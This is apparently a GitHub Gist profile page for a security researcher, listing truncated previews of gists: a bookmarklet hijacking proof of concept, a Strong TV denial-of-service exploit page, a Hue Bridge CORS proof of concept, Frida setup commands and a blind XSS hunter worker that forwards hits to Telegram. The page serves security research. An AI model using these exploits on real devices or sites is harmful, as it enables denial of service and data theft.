✌️
Hack The Planet !

Kamil Vavra vavkamil

@vavkamil
vavkamil / bookmarklet.html
Created October 26, 2023 16:53
Bookmarklet hijacking
<html>
<head>
<title>Bookmarklet hijacking PoC</title>
</head>
<body>
<h1>Bookmarklet hijacking</h1>
<h2>Chromium Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
@vavkamil
vavkamil / covid19-plugin-wp.php
Last active November 16, 2021 19:33
covid19-plugin-wp
<?php
/**
* Plugin Name: covid19-plugin-wp
* Plugin URI: https://wordpress.org/plugins/covid19-plugin-wp
* Description: This plugin adds a custom widget to display Covid19 statistics for a selected country.
* Version: 1.0.1
* Author: @vavkamil
* Author URI: https://vavkamil.cz
* License: GPL v2 or later
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
@vavkamil
vavkamil / strong-tv-dos-poc.html
Last active March 11, 2021 11:41
strong-tv-dos-poc.html
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
<html>
<head>
<title>Hue Bridge CORS PoC</title>
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
#!/usr/bin/env python
import argparse
import urllib.request
import concurrent.futures
from datetime import datetime, timedelta
import sys
domains = ["vavkamil.cz"]
<?php
ob_start();
ini_set('display_errors',0);
$ipa = $_SERVER['HTTP_CLIENT_IP']? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'] );
$useragent = $_SERVER['HTTP_USER_AGENT'];
if(isset($_POST['gotcha'])){
blockBot($ipa);
}
$ apt-get update && apt-get upgrade --assume-yes
$
$ pip3 install frida-tools
$ pip3 install objection
$
$ sudo apt-get install android-tools-adb android-tools-fastboot
$
$ wget https://github.com/frida/frida/releases/download/12.7.0/frida-server-12.7.0-android-arm64.xz
$ unxz frida-server-12.7.0-android-arm64.xz

Keybase proof

I hereby claim:

  • I am vavkamil on github.
  • I am kamil_kiwi (https://keybase.io/kamil_kiwi) on keybase.
  • I have a public key ASDQMrxWDIIThXhqFK9NJhP6hZTdrO5MjI7M_T4bBsTbsAo

To claim this, I am signing this object:

@vavkamil
vavkamil / blind-xss-cloudflare-worker.js
Last active November 2, 2023 14:43
Serverless Blind XSS hunter with Cloudflare Worker
addEventListener("fetch", event => {
event.respondWith(handleRequest(event.request))
})
////////////////////////////////////////////////////////////////////////////////////////////////////
// ! DON'T LEAK THE SECRETS !
// Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/
const telegram_token = "*****REDACTED*****";
const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage";